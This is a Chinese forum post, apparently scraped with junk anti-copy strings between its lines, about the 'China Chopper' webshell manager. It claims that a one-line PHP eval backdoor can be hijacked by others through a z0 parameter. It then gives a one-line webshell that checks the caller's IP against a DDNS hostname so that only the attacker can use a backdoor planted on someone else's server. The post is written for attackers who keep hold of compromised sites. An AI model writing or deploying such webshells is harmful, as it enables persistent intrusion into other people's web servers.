今天试了下“中国菜刀”这款C/S的WEB管理软件,发现一个致命的漏洞
) k7 X$ i7 M& W# }# q8 l+ ^
* o7 H2 d4 V0 B9 j h' ~3 P5 W就算你设置了密码,使用了eval($_REQUEST['moyo']);
+ I _$ I% J7 d/ p3 j4 `3 J0 P; d9 r
* Y" q0 o8 z' y9 P( P+ N" {% M Z) ?但是别人还是可以在不知道连接密码是moyo的情况下直接使用你的一句话后门8 u; Q/ m3 U2 Q6 h$ f4 }
" q3 I+ A% N) G W( U8 R
因为$_REQUEST['moyo']传递的内容是@eval(base64_decode($_POST[z0]));( ?2 w# Z4 a& w f: ]
2 t/ m& s- A7 E, ]
直接访问 /backdoor.php?z0={BASE64加密后的代码} 就可以执行代码了
! P- Z+ K/ y; v7 {' Y' }) Y6 z4 w4 l/ t- P6 p) r* Q
不知道是设计缺陷还是故意留的后门
' \' x2 k& a: R- H& n+ q% C8 A7 q# y$ o |7 G9 h# H1 V
如果有人使用一句话之类的密码,有个小技巧可以避免自己的一句话被人盗用
4 U9 E$ }6 ?, G" I8 G+ ]& X% P% z9 g
本地使用花生壳之类的DDNS软件,比如分配域名是moyo.apiz.org
0 E- n* q6 Q$ J5 y6 a
: G7 c* z7 h' X1 q2 q4 _# `然后一句话后门这样写
/ M4 j( Q, b$ J/ n9 m( M- l. Y% e1 g. s/ R9 ?2 [( e
<?php $_SERVER['REMOTE_ADDR'] == gethostbyname('moyo.apiz.org') ? @eval($_REQUEST['moyo']) : exit('DENIED') ?>
6 u4 z# i$ h2 G5 i1 c( u这样就可以让一句话后门只允许自己的电脑连接了
" b/ E& @3 h' n `3 a4 M
9 q6 [( b K4 G& o: V |